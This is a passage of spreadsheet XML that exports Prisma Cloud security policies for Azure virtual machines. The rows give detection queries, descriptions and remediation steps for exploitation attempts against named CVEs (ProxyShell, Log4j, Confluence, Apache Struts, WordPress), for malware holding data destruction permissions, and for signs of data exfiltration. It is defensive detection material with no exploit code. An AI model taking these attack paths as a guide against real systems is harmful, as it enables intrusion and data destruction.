        </is>
      </c>
      <c r="AB2567" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2567" t="inlineStr"/>
      <c r="AD2567" t="b">
        <v>1</v>
      </c>
      <c r="AE2567" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2567" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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7" t="inlineStr">
        <is>
          <t>c8a8cebb-efca-47fe-acd4-dd66210bbec9</t>
        </is>
      </c>
      <c r="AI2567" t="inlineStr">
        <is>
          <t>80d0fbcc-391b-4b96-91f0-885ef7d92db5</t>
        </is>
      </c>
      <c r="AJ2567" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2567" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2568">
      <c r="A2568" t="inlineStr"/>
      <c r="B2568" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2568" s="2" t="inlineStr"/>
      <c r="D2568" t="inlineStr"/>
      <c r="E2568" t="inlineStr"/>
      <c r="F2568" t="inlineStr"/>
      <c r="G2568" t="b">
        <v>1</v>
      </c>
      <c r="H25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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2568" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2568" t="inlineStr">
        <is>
          <t>Data destruction risk due to malware affected Azure Virtual Machine with data destruction permissions</t>
        </is>
      </c>
      <c r="L2568" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE</t>
        </is>
      </c>
      <c r="M2568" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2568" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2568" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2568" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2568" t="inlineStr"/>
      <c r="R2568" t="inlineStr"/>
      <c r="S2568" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2568" t="b">
        <v>0</v>
      </c>
      <c r="U2568" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2568" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2568" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine affected by malware with data destruction permissions.
The detection of grayware or malware within the virtual machine poses a critical security threat, potentially enabling unauthorized access, data compromise, and operational disruption. Data destruction permissions on malware affected Azure Virtual Machine may allow an attacker to gain access to the machine and leverage that access to delete virtual machines, SQL servers, storage accounts and images and destroy sensitive information stored in your cloud resources causing irreversible damage to your organization.
This policy checks for the following data destruction permissions:
'Microsoft.Compute/disks/delete', 'Microsoft.Compute/virtualMachines/delete', 'Microsoft.Compute/images/delete', 'Microsoft.DBforMySQL/servers/delete', 'Microsoft.Sql/servers/delete', 'Microsoft.Storage/storageAccounts/delete'
Immediate attention is required to remediate the malware reported for the Virtual Machine as soon as possible. Review risky permissions, remove unwanted permissions assigned to the Azure Virtual Machine, and grant only the least privileges required.</t>
        </is>
      </c>
      <c r="X2568"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68" t="inlineStr"/>
      <c r="Z2568" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('Azure VM instance with data destruction permissions'))</t>
        </is>
      </c>
      <c r="AA2568" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2568" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:12</t>
        </is>
      </c>
      <c r="AC2568" t="inlineStr"/>
      <c r="AD2568" t="b">
        <v>1</v>
      </c>
      <c r="AE2568" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2568" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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8" t="inlineStr">
        <is>
          <t>1e1486ec-e775-4c82-b54e-4a1d7aa0a491</t>
        </is>
      </c>
      <c r="AI2568" t="inlineStr">
        <is>
          <t>2eba4ee9-9ceb-430d-bc69-8cdcf1d55a08</t>
        </is>
      </c>
      <c r="AJ2568" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2568" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2569">
      <c r="A2569" t="inlineStr"/>
      <c r="B2569" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2569" s="2" t="inlineStr"/>
      <c r="D2569" t="inlineStr"/>
      <c r="E2569" t="inlineStr"/>
      <c r="F2569" t="inlineStr"/>
      <c r="G2569" t="b">
        <v>1</v>
      </c>
      <c r="H25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69" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2569" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2569" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [WordPress, CVE-2018-6389]</t>
        </is>
      </c>
      <c r="L2569" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2569" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2569" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2569" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2569" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2569" t="inlineStr"/>
      <c r="R2569" t="inlineStr"/>
      <c r="S2569" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2569" t="b">
        <v>0</v>
      </c>
      <c r="U2569" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2569" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2569" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to Denial of Service (DoS) with exploits in the wild [WordPress, CVE-2018-6389].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of WordPress software installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the WordPress [CVE-2018-6389] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X256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CVE-2018-6389
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2018-6389</t>
        </is>
      </c>
      <c r="Y2569" t="inlineStr"/>
      <c r="Z2569" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2018-6389 - WordPress &lt;= 4.9.2 DoS via load-scripts or load-styles) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2018-6389'))</t>
        </is>
      </c>
      <c r="AA2569" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2569" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:48</t>
        </is>
      </c>
      <c r="AC2569" t="inlineStr"/>
      <c r="AD2569" t="b">
        <v>1</v>
      </c>
      <c r="AE2569" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2569" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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69" t="inlineStr">
        <is>
          <t>9901c4f8-084f-403e-aa0b-be80c4f1b94f</t>
        </is>
      </c>
      <c r="AI2569" t="inlineStr">
        <is>
          <t>560ec2ee-ae64-4677-b613-bd7c47efc929</t>
        </is>
      </c>
      <c r="AJ2569" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2569" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2570">
      <c r="A2570" t="inlineStr"/>
      <c r="B2570" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2570" s="2" t="inlineStr"/>
      <c r="D2570" t="inlineStr"/>
      <c r="E2570" t="inlineStr"/>
      <c r="F2570" t="inlineStr"/>
      <c r="G2570" t="b">
        <v>1</v>
      </c>
      <c r="H25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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2570" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2570" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine (Atlassian Confluence Server/Data Center, CVE-2022-26134)</t>
        </is>
      </c>
      <c r="L2570" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2570" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2570" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2570" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2570" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2570" t="inlineStr"/>
      <c r="R2570" t="inlineStr"/>
      <c r="S2570" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2570" t="b">
        <v>0</v>
      </c>
      <c r="U2570" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2570" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2570" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2022-26134).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Atlassian Confluence Server/Data Center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Atlassian Confluence Server/Data Center (CVE-2022-26134) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X257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CVE-2022-26134
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-26134</t>
        </is>
      </c>
      <c r="Y2570" t="inlineStr"/>
      <c r="Z2570" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-26134'))</t>
        </is>
      </c>
      <c r="AA2570" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2570" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:09</t>
        </is>
      </c>
      <c r="AC2570" t="inlineStr"/>
      <c r="AD2570" t="b">
        <v>1</v>
      </c>
      <c r="AE2570" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2570" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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0" t="inlineStr">
        <is>
          <t>deabde57-f789-428e-b255-548eb2e009b0</t>
        </is>
      </c>
      <c r="AI2570" t="inlineStr">
        <is>
          <t>770c43c6-b188-456c-aefb-b01bc2d888a3</t>
        </is>
      </c>
      <c r="AJ2570" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2570" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2571">
      <c r="A2571" t="inlineStr"/>
      <c r="B2571" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2571" s="2" t="inlineStr"/>
      <c r="D2571" t="inlineStr"/>
      <c r="E2571" t="inlineStr"/>
      <c r="F2571" t="inlineStr"/>
      <c r="G2571" t="b">
        <v>1</v>
      </c>
      <c r="H25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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2571" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2571" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Microsoft ProxyShell, CVE-2021-34473]</t>
        </is>
      </c>
      <c r="L2571" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2571" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2571" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2571" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2571" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2571" t="inlineStr"/>
      <c r="R2571" t="inlineStr"/>
      <c r="S2571" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2571" t="b">
        <v>0</v>
      </c>
      <c r="U2571" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2571" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2571" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to remote code execution (RCE) with exploits in the wild [Microsoft ProxyShell, CVE-2021-34473]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of Microsoft software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Microsoft ProxyShell [CVE-2021-34473] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X257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CVE-2021-34473
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-34473</t>
        </is>
      </c>
      <c r="Y2571" t="inlineStr"/>
      <c r="Z2571" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-34473 - ProxyShell) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-34473'))</t>
        </is>
      </c>
      <c r="AA2571" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2571" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:48</t>
        </is>
      </c>
      <c r="AC2571" t="inlineStr"/>
      <c r="AD2571" t="b">
        <v>1</v>
      </c>
      <c r="AE2571" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2571" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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1" t="inlineStr">
        <is>
          <t>499c1cfc-c9b9-4c5e-b5fb-06ac371ed829</t>
        </is>
      </c>
      <c r="AI2571" t="inlineStr">
        <is>
          <t>dddd9dfd-dc5b-41df-b111-3041a875207f</t>
        </is>
      </c>
      <c r="AJ2571" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2571" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2572">
      <c r="A2572" t="inlineStr"/>
      <c r="B2572" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2572" s="2" t="inlineStr"/>
      <c r="D2572" t="inlineStr"/>
      <c r="E2572" t="inlineStr"/>
      <c r="F2572" t="inlineStr"/>
      <c r="G2572" t="b">
        <v>1</v>
      </c>
      <c r="H25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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2572" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2572" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on Azure VM with known exploitable vulnerability (CVE-2023-50164, Apache Struts)</t>
        </is>
      </c>
      <c r="L2572" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2572" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2572" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2572" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2572" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2572" t="inlineStr"/>
      <c r="R2572" t="inlineStr"/>
      <c r="S2572" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2572" t="b">
        <v>0</v>
      </c>
      <c r="U2572" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2572" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2572" t="inlineStr">
        <is>
          <t>This policy identifies attempts to exploit a known vulnerability (CVE-2023-50164) in applications running on Azure VM resources. The presence of CVE-2023-50164 in the application indicates a critical security risk that could allow attackers to perform directory traversal attacks, leading to unauthorized access to system files and performing arbitary code execution.
Detecting attempts to exploit this vulnerability underscores the urgency of assessing and securing affected applications to prevent successful attacks. The exploitation of CVE-2023-50164 could lead to significant security incidents, including unauthorized access to sensitive data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CVE-2023-50164 vulnerability on affected Azure VM instances.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2572" t="inlineStr">
        <is>
          <t>[Vulnerability]
1. Identify and access the reported resource affected by CVE-2023-50164
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
https://nvd.nist.gov/vuln/detail/CVE-2023-50164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572" t="inlineStr"/>
      <c r="Z2572" t="inlineStr">
        <is>
          <t>asset WHERE asset.type = 'azure-vm-list' and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2023-50164 - Apache Struts Directory Traversal) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2023-50164'))</t>
        </is>
      </c>
      <c r="AA2572" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2572" t="inlineStr">
        <is>
          <t>2024-05-23 08:56:28</t>
        </is>
      </c>
      <c r="AC2572" t="inlineStr"/>
      <c r="AD2572" t="b">
        <v>1</v>
      </c>
      <c r="AE2572" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2572" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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2" t="inlineStr">
        <is>
          <t>d747f6ed-0c5a-4749-a9cf-acf20609f8a6</t>
        </is>
      </c>
      <c r="AI2572" t="inlineStr">
        <is>
          <t>ee782ad4-2793-4679-a5b5-6130317f1e1d</t>
        </is>
      </c>
      <c r="AJ2572" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2572" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2573">
      <c r="A2573" t="inlineStr"/>
      <c r="B2573" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2573" s="2" t="inlineStr"/>
      <c r="D2573" t="inlineStr"/>
      <c r="E2573" t="inlineStr"/>
      <c r="F2573" t="inlineStr"/>
      <c r="G2573" t="b">
        <v>1</v>
      </c>
      <c r="H25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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2573" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2573" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [OpenLiteSpeed, Multiple CVEs]</t>
        </is>
      </c>
      <c r="L2573" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2573" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2573" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2573" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2573" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2573" t="inlineStr"/>
      <c r="R2573" t="inlineStr"/>
      <c r="S2573" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2573" t="b">
        <v>0</v>
      </c>
      <c r="U2573" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2573" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2573" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to remote code execution (RCE) with exploits in the wild [OpenLiteSpeed, Multiple CVEs]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of OpenLiteSpeed software installed makes it an easy target for an attacker to exploit these vulnerabilities. 
Immediate attention is required to remediate the OpenLiteSpeed vulnerabilities reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X257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CVE-2022-0072
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-0072
   https://nvd.nist.gov/vuln/detail/CVE-2022-0073
   https://nvd.nist.gov/vuln/detail/CVE-2022-0074</t>
        </is>
      </c>
      <c r="Y2573" t="inlineStr"/>
      <c r="Z2573" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-0072, CVE-2022-0073, CVE-2022-0074 - OpenLiteSpeed Remote Code Execution) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-0072', 'CVE-2022-0073', 'CVE-2022-0074'))</t>
        </is>
      </c>
      <c r="AA2573" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2573" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:47</t>
        </is>
      </c>
      <c r="AC2573" t="inlineStr"/>
      <c r="AD2573" t="b">
        <v>1</v>
      </c>
      <c r="AE2573" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2573" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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3" t="inlineStr">
        <is>
          <t>873f8ce6-6983-4edd-b88a-504354f1aa4d</t>
        </is>
      </c>
      <c r="AI2573" t="inlineStr">
        <is>
          <t>431fd666-2294-4403-872c-06168644c69f</t>
        </is>
      </c>
      <c r="AJ2573" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2573" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2574">
      <c r="A2574" t="inlineStr"/>
      <c r="B2574" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2574" s="2" t="inlineStr"/>
      <c r="D2574" t="inlineStr"/>
      <c r="E2574" t="inlineStr"/>
      <c r="F2574" t="inlineStr"/>
      <c r="G2574" t="b">
        <v>1</v>
      </c>
      <c r="H25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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2574" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2574" t="inlineStr">
        <is>
          <t>Potential indication of data exfiltration activity on a publicly exposed and vulnerable Azure Virtual Machine</t>
        </is>
      </c>
      <c r="L2574" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE,DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M2574" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2574" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2574" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2574" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2574" t="inlineStr"/>
      <c r="R2574" t="inlineStr"/>
      <c r="S2574" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2574" t="b">
        <v>0</v>
      </c>
      <c r="U2574" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2574" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2574" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which are publicly exposed, have critical or high vulnerabilities and high volume data transfer activity.
The high volume data transfer could be a data exfiltration attempt. Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they've collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Attackers can exploit vulnerabilities on the Virtual Machines to compromise the confidentiality, integrity and availability of the affected Virtual Machine and perform malicious actions. If network connectivity with remote systems known for high volume data transfer activity is observed on a publicly exposed and exploitable virtual machine, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to investigate the high volume data transfer activity, remediate the critical or high vulnerabilities and restrict the public exposure reported for the Virtual Machines as soon as possible.</t>
        </is>
      </c>
      <c r="X257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74" t="inlineStr"/>
      <c r="Z2574" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Unusual high volume data transfer activity from a monitored cloud account') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2574" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2574" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2574" t="inlineStr"/>
      <c r="AD2574" t="b">
        <v>1</v>
      </c>
      <c r="AE2574" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2574" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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4" t="inlineStr">
        <is>
          <t>0d781a8d-c9cd-46b5-b6eb-44b29c5e13a3</t>
        </is>
      </c>
      <c r="AI2574" t="inlineStr">
        <is>
          <t>712f085d-5041-4e06-80d0-dd1765771b5d</t>
        </is>
      </c>
      <c r="AJ2574" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2574" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2575">
      <c r="A2575" t="inlineStr"/>
      <c r="B2575" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2575" s="2" t="inlineStr"/>
      <c r="D2575" t="inlineStr"/>
      <c r="E2575" t="inlineStr"/>
      <c r="F2575" t="inlineStr"/>
      <c r="G2575" t="b">
        <v>1</v>
      </c>
      <c r="H25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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2575" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2575" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine (Apache Log4j, CVE-2021-44832)</t>
        </is>
      </c>
      <c r="L2575" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2575" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2575" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2575" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2575" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2575" t="inlineStr"/>
      <c r="R2575" t="inlineStr"/>
      <c r="S2575" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2575" t="b">
        <v>0</v>
      </c>
      <c r="U2575" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2575" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2575" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2021-44832).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Log4j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Log4j (CVE-2021-44832) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X257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CVE-2021-44832
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-44832</t>
        </is>
      </c>
      <c r="Y2575" t="inlineStr"/>
      <c r="Z2575" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-44832'))</t>
        </is>
      </c>
      <c r="AA2575" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2575" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:15</t>
        </is>
      </c>
      <c r="AC2575" t="inlineStr"/>
      <c r="AD2575" t="b">
